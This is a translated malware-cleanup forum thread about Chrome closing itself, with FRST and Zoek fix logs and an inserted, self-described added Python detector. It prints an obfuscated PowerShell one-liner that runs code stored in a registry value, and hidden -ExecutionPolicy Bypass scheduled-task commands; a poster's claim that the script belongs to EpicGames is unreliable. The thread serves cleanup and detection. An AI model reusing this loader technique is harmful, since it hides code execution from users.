HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\regfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.reg: regfile => <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\batfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.bat: batfile => <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\cmdfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.cmd: cmdfile => <==== ATTENTION
FirewallRules: [{395B3311-5A73-4561-9758-481CD398A729}] => (Block) PCBS.exe => No File

Virustotal: C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Virustotal: C:\WINDOWS\system32\7CB70479-6581-4B43-912B-52A357E12051.ps1
Virustotal: C:\Users\Woytman\AppData\Roaming\nuvotonISP.lua

HOSTS:
EmptyTemp:
End

(You can use the "select all" function; right-click in the top-left field of the open Notepad and choose "Paste".)

Save it to the desktop as fixlist.txt


Run FRST and press the "Fix" button just once, then wait.
The tool will produce a log on the desktop (Fixlog.txt); please copy its entire content here.

Do you know the highlighted folders/files?
C:\Users\Woytman\klkcjajbnhfgbomfdfpaojadidaapeni folder?
C:\Users\Woytman\AppData\Local\unali-40699656 folder?
C:\Users\Woytman\AppData\Local\unali-40699531 folder?
C:\WINDOWS\system32\7CB70479-6581-4B43-912B-52A357E12051.ps1

Re: Chrome shuts down on its own

Post by autoprd » 08 Nov 2022 19:19

The file in system32 with the .ps1 extension belongs to EpicGames

Code:

$LZhhZzKBhoaF=[ScriptBlock];$ipKxngQOCHKQPg=[string];$tARKNuqkZQb=[char]; icm ($LZhhZzKBhoaF::Create($ipKxngQOCHKQPg::Join('', ((gp 'HKLM:\SOFTWARE\EpicGamessxg1P').'8ICNbJnUCK' | % { [char]$_ }))))

I'd rather delete it; if that affects EpicGames, it will let me know :)

C:\Users\Woytman\AppData\Local\unali-40699656
C:\Users\Woytman\AppData\Local\unali-40699531
They were empty, I deleted them.

C:\Users\Woytman\klkcjajbnhfgbomfdfpaojadidaapeni
I couldn't track it down; most likely it was a TEMP folder of some program, which CCleaner deleted

Btw: SkillBrains in the log is LightShot, a screenshot program; it is clean, it just gets falsely flagged as a virus.

On to the log
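
The detection logic a responder could run over the logs in this thread, as an added example that is not part of the original posts or of FRST: it flags the hidden PowerShell tasks from the fixlist and statically reads the quoted .ps1 one-liner, which pulls a registry value, casts each element to a character and runs the result as a script block. The function names and the decoded sample value are constructed for illustration.

```python
import re

# Scheduled-task lines copied from the FRST fixlist on this page.
FRST_TASK_LINES = [
    r'Task: {5FDD0220-E4B9-4462-AC20-4D9BDB16070E} - System32\Tasks\Microsoft\Windows\Management\Provisioning\User => powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\WINDOWS\System32\57540306-c3ad-454f-bbe7-1c56160757fe.ps1" <==== ATTENTION',
    r'Task: {96BB2A72-BBD3-4A21-B7F2-C23A745E8678} - System32\Tasks\Microsoft\Windows\MUI\LPRemovea93Lqu => powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\D5910F34-9B2F-4E01-80CF-49460B7AF191.ps1" <==== ATTENTION',
    r'Task: {6A7B9D49-E5BF-4199-8990-7D182ADBB306} - System32\Tasks\GoogleUpdateTaskMachineCore{07D74F8D-CE32-4182-A77B-CF36AB803647} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)',
]

# Body of the .ps1 file as quoted in the post above.
PS1_BODY = r"""$LZhhZzKBhoaF=[ScriptBlock];$ipKxngQOCHKQPg=[string];$tARKNuqkZQb=[char]; icm ($LZhhZzKBhoaF::Create($ipKxngQOCHKQPg::Join('', ((gp 'HKLM:\SOFTWARE\EpicGamessxg1P').'8ICNbJnUCK' | % { [char]$_ }))))"""

# Constructed, harmless stand-in for the data stored in the registry value.
CONSTRUCTED_VALUE = [ord(c) for c in "Write-Output 'constructed sample'"]

TASK_RE = re.compile(r'^Task: (\{[0-9A-Fa-f-]{36}\}) - (.+?) => (.+)$')
GUID_PS1_RE = re.compile(
    r'\\System32\\[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\.ps1', re.I)


def triage_task(line):
    """Parse one FRST 'Task:' line and list the reasons it looks suspicious."""
    m = TASK_RE.match(line.strip())
    if not m:
        return None
    guid, task_path, action = m.groups()
    low = action.lower()
    reasons = []
    if 'powershell' in low:
        if re.search(r'-(executionpolicy|ep)\s+bypass', low):
            reasons.append('execution policy bypass')
        if re.search(r'-(windowstyle|w)\s+hidden', low):
            reasons.append('hidden window')
        if GUID_PS1_RE.search(action):
            reasons.append('GUID-named script in System32')
    return {'guid': guid, 'task': task_path, 'reasons': reasons}


def flagged_tasks(lines):
    """Return only the parsed tasks that carry at least one reason."""
    parsed = (triage_task(line) for line in lines)
    return [t for t in parsed if t and t['reasons']]


def analyze_loader(ps1_text):
    """Static read of a .ps1 body: nothing is executed, only matched."""
    # Resolve type aliases such as $x=[ScriptBlock] used to hide type names.
    aliases = {m.group(1).lower(): m.group(2).lower()
               for m in re.finditer(r'\$(\w+)\s*=\s*\[(\w+)\]', ps1_text)}
    builds_block = any(
        aliases.get(v.lower()) == 'scriptblock'
        for v in re.findall(r'\$(\w+)::Create\(', ps1_text)
    ) or bool(re.search(r'\[scriptblock\]::Create\(', ps1_text, re.I))
    # (gp '<key>').'<value name>' is a registry read via Get-ItemProperty.
    reg = re.search(
        r"\b(?:gp|Get-ItemProperty)\s+'([^']+)'\s*\)\s*\.\s*'([^']+)'",
        ps1_text, re.I)
    invokes = bool(re.search(
        r'\b(?:icm|Invoke-Command|iex|Invoke-Expression)\b', ps1_text, re.I))
    decodes = bool(re.search(r'\[char\]\s*\$_', ps1_text, re.I))
    return {
        'registry_key': reg.group(1) if reg else None,
        'value_name': reg.group(2) if reg else None,
        'builds_scriptblock': builds_block,
        'invokes': invokes,
        'decodes_chars': decodes,
        # All four together: code kept in the registry, run from memory.
        'fileless_loader': (reg is not None and builds_block
                            and invokes and decodes),
    }


def decode_registry_value(data):
    """Turn exported registry data (ints or bytes) into text for reading."""
    return ''.join(chr(b) for b in data)


if __name__ == '__main__':
    for task in flagged_tasks(FRST_TASK_LINES):
        print(task['task'], '->', ', '.join(task['reasons']))
    print(analyze_loader(PS1_BODY))
    print(decode_registry_value(CONSTRUCTED_VALUE))
```

The registry key and value name that `analyze_loader` extracts are where the real script text lives, so that value is what needs to be exported and reviewed before the key is removed.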

Re: Chrome shuts down on its own

Post by autoprd » 08 Nov 2022 19:23

Fix result of Farbar Recovery Scan Tool (x64) Version: 06-11-2022
Ran by Woytman (08-11-2022 19:20:08) Run:1
Running from C:\Users\Woytman\Desktop
Loaded Profiles: Woytman
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
HKLM\...\Policies\Explorer: [HideSCAMeetNow] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Policies\Explorer: [HideSCAMeetNow] 1
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\MountPoints2: {4da3b049-162e-11ed-8c8f-4889e716f2dc} - "F:\Lenovo_Suite.exe"
HKU\S-1-5-18\...\Run: [RazerAxon] => "C:\Program Files (x86)\Razer\Razer Axon\RazerAxon.exe" -autorun (No File)
ShortcutTarget: DeepL auto-start.lnk -> (No File)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION
Task: {00AAE17D-5854-4922-8396-86326F51A6D2} - System32\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (No File)
Task: {52510CA0-CD65-48FC-99C5-CF57314CEC65} - \Microsoft\Windows\Management\Provisioning\xiHM0g\046E4CE2-D25A-4B57-A2E2-3AD7D55DFBDB -> No File <==== ATTENTION
Task: {5FDD0220-E4B9-4462-AC20-4D9BDB16070E} - System32\Tasks\Microsoft\Windows\Management\Provisioning\User => powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\WINDOWS\System32\57540306-c3ad-454f-bbe7-1c56160757fe.ps1" <==== ATTENTION
Task: {6A7B9D49-E5BF-4199-8990-7D182ADBB306} - System32\Tasks\GoogleUpdateTaskMachineCore{07D74F8D-CE32-4182-A77B-CF36AB803647} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)
Task: {96BB2A72-BBD3-4A21-B7F2-C23A745E8678} - System32\Tasks\Microsoft\Windows\MUI\LPRemovea93Lqu => powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\D5910F34-9B2F-4E01-80CF-49460B7AF191.ps1" <==== ATTENTION
Task: {B2F82E57-5A82-46F4-88DC-C41367AF04D9} - System32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (No File)
Task: {F3ED570E-C6D2-4C9E-964E-E3430B16320F} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (No File)
Winsock: Catalog9 17 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9 18 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9-x64 17 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9-x64 18 %windir%\system32\vsocklib.dll => No File
CHR HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]
C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440}
FCheck: C:\WINDOWS\SysWOW64\version_IObitDel.dll [2021-04-03] <==== ATTENTION (zero byte File/Folder)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2\InprocServer32 -> => No File
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32 -> => No File
ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
ContextMenuHandlers5: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\regfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.reg: regfile => <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\batfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.bat: batfile => <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\cmdfile: <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.cmd: cmdfile => <==== ATTENTION
FirewallRules: [{395B3311-5A73-4561-9758-481CD398A729}] => (Block) PCBS.exe => No File

Virustotal: C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Virustotal: C:\WINDOWS\system32\7CB70479-6581-4B43-912B-52A357E12051.ps1
Virustotal: C:\Users\Woytman\AppData\Roaming\nuvotonISP.lua

HOSTS:
EmptyTemp:
End
*****************

Restore point was successfully created.
Processes closed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAMeetNow" => removed successfully
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => removed successfully
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate => removed successfully
"HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAMeetNow" => removed successfully
"HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NolowDiskSpaceChecks" => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{4da3b049-162e-11ed-8c8f-4889e716f2dc} => removed successfully
"HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\RazerAxon" => removed successfully
"ShortcutTarget: DeepL auto-start.lnk -> (No File)" => not found
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\ProgramData\NTUSER.pol => moved successfully
HKLM\SOFTWARE\Policies\Microsoft\Edge => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Policies\Microsoft\Edge => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{00AAE17D-5854-4922-8396-86326F51A6D2}" => not found
"C:\WINDOWS\System32\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\update-S-1-5-21-3110588475-2115266248-3539613761-1001" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{52510CA0-CD65-48FC-99C5-CF57314CEC65}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{52510CA0-CD65-48FC-99C5-CF57314CEC65}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\xiHM0g\046E4CE2-D25A-4B57-A2E2-3AD7D55DFBDB" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5FDD0220-E4B9-4462-AC20-4D9BDB16070E}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5FDD0220-E4B9-4462-AC20-4D9BDB16070E}" => removed successfully
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Management\Provisioning\User => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Management\Provisioning\User" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6A7B9D49-E5BF-4199-8990-7D182ADBB306}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6A7B9D49-E5BF-4199-8990-7D182ADBB306}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore{07D74F8D-CE32-4182-A77B-CF36AB803647} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore{07D74F8D-CE32-4182-A77B-CF36AB803647}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{96BB2A72-BBD3-4A21-B7F2-C23A745E8678}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{96BB2A72-BBD3-4A21-B7F2-C23A745E8678}" => removed successfully
C:\WINDOWS\System32\Tasks\Microsoft\Windows\MUI\LPRemovea93Lqu => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\MUI\LPRemovea93Lqu" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B2F82E57-5A82-46F4-88DC-C41367AF04D9}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B2F82E57-5A82-46F4-88DC-C41367AF04D9}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CCDFC0B8-01A3-4E74-A820-4F13F51D269E}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CCDFC0B8-01A3-4E74-A820-4F13F51D269E}" => removed successfully
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F3ED570E-C6D2-4C9E-964E-E3430B16320F}" => not found
"C:\WINDOWS\System32\Tasks\update-sys" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\update-sys" => not found
HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000017 => removed successfully
HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000018 => removed successfully
HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000017 => removed successfully
HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries64\000000000018 => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Google\Chrome\Extensions\bbjllphbppobebmjpjcijfbakobcheof => removed successfully
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb => removed successfully
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\ihcjicgdanjaechkgeegckofjjedodee => removed successfully
"C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440}" => not found
C:\WINDOWS\SysWOW64\version_IObitDel.dll => moved successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2 => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2} => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\ FileSyncEx => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\Offline Files => removed successfully
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\ FileSyncEx => removed successfully
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Offline Files => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\regfile => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.reg => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\batfile => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.bat => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\cmdfile => removed successfully
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Classes\.cmd => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{395B3311-5A73-4561-9758-481CD398A729}" => removed successfully
"VirusTotal: C:\Program Files (x86)\Skillbrains\Updater\Updater.exe" => not found
"VirusTotal: C:\WINDOWS\system32\7CB70479-6581-4B43-912B-52A357E12051.ps1" => not found
VirusTotal: C:\Users\Woytman\AppData\Roaming\nuvotonISP.lua => https://www.virustotal.com/gui/file/c94 ... 1667931630
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

FlushDNS => completed
BITS transfer queue => 1310720 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 10742843 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 380491127 B
Windows/system/drivers => 2041978 B
Edge => 0 B
Chrome => 466551548 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 200143 B
LocalService => 200143 B
NetworkService => 202041 B
Woytman => 57666520 B

RecycleBin => 0 B
EmptyTemp: => 876.8 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 19:21:22 ====

Re: Chrome shuts down on its own

Post by jaro3 » 08 Nov 2022 19:59

Turn off your antivirus and firewall, RogueKiller, Malwarebytes Antimalware, Windows Defender
Download zoek:
https://uloz.to/file/nFH1LwSrGioP/zoek1-rar

Close all other programs, windows and browsers.
Run Zoek.exe (on Windows Vista, Windows 7 and 8, right-click it and choose "Run as administrator")
- note that the program may take a while to start.
Paste the script below into the program window:

Code:

autoclean;
resethosts;
emptyclsid;
IEdefaults;
FFdefaults;
CHRdefaults;
emptyIEcache;
emptyFFcache;
emptyCHRcache;
emptyalltemp;
emptyflash;
emptyjava;
emptyrecycle.bin;

Click Run Script.
The program will run a scan and a repair; both can take several minutes, so wait until it finishes. Do not click in the window!
The program will offer a restart; confirm it.
After the restart, only a black desktop may be shown for some time; that is normal. Wait until the log is created. You can save it, for example, to Documents; otherwise it is saved automatically to:
C:\zoek-results.log Copy the entire content of that log here.
If there are problems, run zoek in safe mode.


Download Zemana AntiMalware Free from this link:
https://www.zemana.com/Download/AntiMal ... .Setup.exe

(scroll down to the download)
and save it to your desktop.
Double-click the file on the desktop and follow the instructions to install the program.
Accept the program's license (EULA) if it is offered.
If a program update is available, click the "Update now" button.
Close all open files, folders and browsers.
Do not change any settings. Click "Scan now".
After the scan you can see whether there are any infections. Click "Apply" (delete). The infections will be moved to quarantine.
When the scan is finished, click "Reports" on the left, then "Open report", and copy the entire content of that report here.

Post a new HJT log + report on any problems


Re: Chrome keeps closing on its own

Post by autoprd » 08 Nov 2022 21:32

Zoek.exe v5.0.0.2 Updated 03-May-2018(Online Version)
Tool run by Woytman on 08.11.2022 at 21:00:21,33.
Microsoft Windows 11 Home 10.0.22000 x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\Woytman\Desktop\zoek (1).exe [Scan current user] [Script inserted]

==== Older Logs ======================

C:\zoek-results2022-11-08-193707.log 1873 bytes

==== Reset Hosts File ======================

# Copyright (c) 1993-2006 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

# localhost name resolution is handled within DNS itself.
127.0.0.1 localhost
::1 localhost

==== Empty Folders Check ======================

C:\Users\Woytman\AppData\Local\DBG deleted successfully

==== Deleting CLSID Registry Keys ======================

HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{001CBD50-B04C-4E64-8B9A-BE23B46CECC9} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{01A5E2C4-740A-40A4-93D2-8F4A1C1A7C04} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0290EBEE-E1F3-48F0-8D12-9061610DED3D} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1BD5FC40-D61C-47A1-A682-F2047C8A8136} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2F2A1B40-F68A-4179-A528-CEFF4E43A969} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4BB52B00-BCCF-4814-9281-96A2757366C0} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4E4BEF9D-F2C2-406F-96A1-48ACAE8E3FC8} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{51FC9773-C140-4D4E-BD71-8D784A25AD7E} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{695DB471-54D4-4DD7-9676-4944254A4AFB} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{88A8F1C5-096A-4D1F-98BF-65B40E8B3CFF} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9410D093-79B2-4ABD-84FD-B3EA740A90BD} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B636FA21-1A69-45FB-B76B-430FA5D2CDE8} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{CE52AE49-0D28-42F8-A417-66AB5E5AC805} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D7026CA1-5680-49B0-A702-A110AD0508FC} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{EE4BC132-6FCC-4E07-8E8A-E2D0E9162F6A} deleted successfully
HKEY_USERS\S-1-5-21-3110588475-2115266248-3539613761-1001\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F1801D58-9E26-415F-93B4-27E718781CE1} deleted successfully

==== Deleting CLSID Registry Values ======================


==== Deleting Services ======================


==== Deleting Files \ Folders ======================

C:\Users\Woytman\AppData\Roaming\.tlauncher deleted
C:\Users\Woytman\AppData\Roaming\qBittorrent deleted
C:\Users\Woytman\AppData\Roaming\uTorrent deleted
C:\windows\SysNative\Tasks\Dragon_Center_updater deleted
C:\PROGRA~3\fontcacheev1.dat deleted
C:\PROGRA~3\Package Cache deleted
C:\windows\SysNative\GroupPolicy\User deleted
"C:\DumpStack.log.tmp" not deleted
"C:\PROGRA~2\Skillbrains\lightshot\5.5.0.7\DXGIODScreenshot.dll" deleted
"C:\PROGRA~2\Skillbrains\lightshot\5.5.0.7\Lightshot.dll" deleted
"C:\PROGRA~2\Skillbrains\lightshot\5.5.0.7\Lightshot.exe" deleted
"C:\PROGRA~2\Skillbrains\lightshot\5.5.0.7\uploader.dll" deleted
"C:\PROGRA~2\Skillbrains" deleted
"C:\PROGRA~2\Skillbrains\lightshot" deleted
"C:\PROGRA~2\Skillbrains\lightshot\5.5.0.7" deleted

==== Orphaned Tasks deleted from Registry ======================

Dragon_Center_updater deleted

==== Chromium Look ======================


Just Black - Woytman\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aghfnjkcakhmadgdomlmlhhaocbkloab
Malwarebytes Browser Guard - Woytman\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ihcjicgdanjaechkgeegckofjjedodee
Dark Reader - Woytman\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ifoakfbpdcdoeenechcleahebpibofpc

==== Set IE to Default ======================

